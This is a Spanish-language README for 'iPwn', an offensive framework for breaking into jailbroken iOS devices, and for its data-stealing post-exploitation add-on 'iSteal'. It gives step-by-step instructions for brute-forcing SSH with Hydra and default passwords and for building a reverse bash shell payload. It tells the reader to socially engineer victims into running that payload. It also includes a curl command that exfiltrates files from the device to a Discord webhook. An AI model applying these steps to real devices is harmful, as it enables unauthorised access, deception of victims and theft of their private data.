
Un framework diseñado para la explotación de dispositivos iOS.
Un framework diseñado para la explotación de dispositivos iOS.

<!> RECUERDA: EL IPHONE AL QUE INTENTAS ACCEDER CON ESTA HERRAMIENTA DEBE ESTAR HACKEADO (JAILBROKEN) <!>
Este proyecto aún está en desarrollo. Estoy agregando más extensiones y opciones para post-explotación con el fin de recolectar información del dispositivo y otras cosas. También estoy trabajando en una forma de incorporar un payload en un tweak normal de iOS para que obtener una reverse shell sea más fácil.
[6/2/21] - Se agregó un menú adicional para personas que tienen sus dispositivos conectados a su computadora y quieren experimentar con ellos. Pronto se agregarán más opciones.
[6/2/21] - Se agregaron 4 módulos extra para la herramienta de post-explotación 'iSteal'. También se añadió una opción para instalar el jailbreak checkra1n.
[5/25/21] - Se agregaron 8 módulos extra para la herramienta de post-explotación 'iSteal'.
[5/25/21] - Se agregaron 2 módulos extra para la herramienta de post-explotación 'iSteal'.
iPwn es un framework diseñado para explotar y obtener acceso a dispositivos iOS. También tiene una extensión que es un mini-framework llamado 'iSteal' que está diseñado para la post-explotación (después de obtener acceso al dispositivo). Esta descripción te guiará a través de las diferentes formas y pasos para obtener acceso a un dispositivo iOS y extraer información del mismo.
La primera forma de obtener acceso a un dispositivo iOS. - SSH-Bruteforcing.
La mayoría de los dispositivos iOS con jailbreak que tienen Cydia vienen preinstalados con OpenSSH. Y generalmente, las credenciales son muy débiles o comunes; una de las contraseñas más comunes estará incluida en una lista de palabras que debería estar en tu carpeta si descargaste iPwn desde mi Github.
¡Así que empecemos! Primero, comenzaremos ejecutando el script.
python main.py
Luego, escribiremos el comando 'brute'. (Si quieres escribir help y familiarizarte con los comandos, puedes hacerlo).

Una vez que escribamos el comando 'brute', escribe 'help' para mostrar todos los comandos disponibles.
Ahora, usaremos el comando 'default' para iniciar SSH-Bruteforcing con una lista de palabras que contiene las contraseñas más comunes.
Se te pedirá que ingreses la dirección IP del objetivo; asegúrate de ingresar la correcta y válida, presiona Enter y luego continúa con el siguiente paso.

<!> SI ESTÁS OBTENIENDO ERRORES, ASEGÚRATE DE QUE HYDRA ESTÉ INSTALADO. PUEDES INSTALAR HYDRA CON LOS COMANDOS A CONTINUACIÓN <!>
comandos para instalar hydra:
sudo apt install hydra
sudo pacman -S hydra
Volviendo al tutorial, si tienes hydra instalado en tu PC, ya debería estar intentando hacer fuerza bruta. Solo espera entre 20 y 40 segundos; si el dispositivo utiliza las credenciales predeterminadas/comunes proporcionadas en la lista de palabras, Hydra te dará un pequeño mensaje que muestra la contraseña correcta.

Como podemos ver, la contraseña correcta es 'alpine'. Ahora podemos iniciar sesión en el teléfono haciendo 'ssh root@ip_del_dispositivo' en otra ventana de terminal. Cuando te pida una contraseña, simplemente ingresa la contraseña que obtuviste de Hydra.

¡Ahora hemos iniciado sesión!

En este punto, probablemente queramos recopilar información sobre el teléfono y controlarlo; eso vendrá después. Porque primero necesitamos instalar algunas cosas muy importantes. Si quieres usar SCP para transferir el archivo de configuración que automatiza todo, puedes hacerlo. El archivo está en /post-exploitation/post.sh. Una vez que hayas transferido el archivo 'post.sh' al dispositivo iOS, ejecútalo haciendo 'bash post.sh' y debería comenzar a instalar y configurar las herramientas de post-explotación que usaremos.
<!> NOTA: LOS COMANDOS A CONTINUACIÓN SON SOLO PARA LAS PERSONAS QUE QUIERAN INSTALAR LOS PAQUETES Y HERRAMIENTAS NECESARIOS MANUALMENTE <!>
ejecuta todos estos comandos para configurar/instalar todo lo necesario:
apt install netcat
apt install python3
apt install nano
git clone https://github.com/0x1CA3/iSteal.git
Bien, ahora que tenemos todo instalado, podemos ir a la carpeta 'iSteal' y ejecutar el script de post-explotación 'iSteal'.
python3 post.py
<!> NOTA: Asegúrate de que al ejecutar archivos python, lo hagas usando "python3" en lugar de "python" o "py" <!>
Entonces el script ya debería estar cargado; si quieres usar el comando 'help' y explorar, puedes hacerlo.

Ahora, vamos a usar el comando 'list' para mostrar los módulos/opciones disponibles para post-explotación.

<!> TEN EN CUENTA: HABRÁ MUCHAS ACTUALIZACIONES EN EL SCRIPT DE POST-EXPLOTACIÓN, Y SE AGREGARÁN MÁS MÓDULOS, POR LO QUE ESTA IMAGEN SE ACTUALIZARÁ PARA MANTENER LA PRECISIÓN <!>
Para usar un módulo, simplemente haz 'use módulo/específico'. Ejemplo: use modules/list_installed_default_apps
Y como puedes ver, cuando ejecutamos ese módulo, nos muestra las aplicaciones predeterminadas instaladas en el dispositivo iOS del objetivo.

La segunda forma de obtener acceso a un dispositivo iOS. - Reverse shell.
Ahora, te voy a mostrar cómo hacerlo de la segunda manera, que es un poco más avanzada. Ten en cuenta que no incluiré imágenes para esta parte.
ejecuta el framework iPwn haciendo 'python main.py'
escribe el comando 'payload'
espera a que se cargue la fábrica de payloads.
selecciona un payload de tu elección, Ejemplo: use payloads/factory/reverse_bash
ingresa tu IP
ingresa tu Puerto
luego deberías recibir un mensaje que dice 'payload generated'
escribe el comando 'back' para volver al menú principal
escribe el comando 'listen' para empezar a escuchar conexiones entrantes
asegúrate de que la víctima ejecute el script a través de la terminal o por su cuenta; intenta ingeniería social, ¡sé creativo!
una vez que el script se ejecute en el dispositivo iOS de la víctima, deberías recibir una conexión
instala los paquetes importantes transfiriendo el archivo 'post.sh' ubicado en /post-exploitation y ejecutándolo, o hazlo manualmente.
ahora puedes ejecutar las herramientas de post-explotación 'iSteal' o 'AutoEnum'
¡disfruta! :)
<!> Si estás haciendo el paso 2 y te quedas atascado en la parte donde tienes que instalar los paquetes/herramientas importantes, ve al paso 1 y copia la guía para instalar los paquetes/herramientas. <!>
Hay múltiples formas de transferir archivos al dispositivo iOS y también muchas maneras de descargarlos. La forma más fácil de extraer y descargar archivos del dispositivo iOS es usar Curl y un webhook de Discord.
<!> NOTA: El segmento a continuación demostrará cómo extraer y descargar archivos del dispositivo iOS usando curl <!>
Paso 1: Crea un servidor de Discord
Paso 2: Crea un webhook y copia el enlace
Paso 3: En el dispositivo iOS, navega al directorio que contiene el archivo que deseas recuperar.
Paso 4: Ingresa el comando a continuación (reemplaza archivo_aqui.txt con el nombre de tu archivo, y reemplaza url_del_webhook_aqui con la url de tu webhook)
curl -i -H 'Expect: application/json' -F file=@archivo_aqui.txt -F 'payload_json={ "wait": true, "content": "", "username": "" }' url_del_webhook_aqui
Paso 5: Espera entre 10 y 50 segundos
¡Listo! El archivo debería haberse subido a tu servidor de Discord. Ahora puedes descargar/visualizar el archivo.
Windows 10 - Estable
Garuda Linux - Estable
Distribuciones basadas en Arch - Estable
Dispositivos compatibles [La extensión de post-explotación debería funcionar en todos estos]
-----------------
iPods más nuevos que el iPod de 4ª generación
iPhone 4
iPhone 4S
iPhone 5
iPhone 6
iPhone SE
iPhone 7
iPhone 7+
iPhone 8
iPhone 8+
iPhone X
iPhone XR
iPhone XS
iPhone 11
iPhone 12
Mis propios dispositivos probados [Los que yo mismo he probado personalmente]
---------------------
iPhone 4S
iPhone 5S
iPhone SE
iPhone 7+
iPad Air
iPod 4ª generación
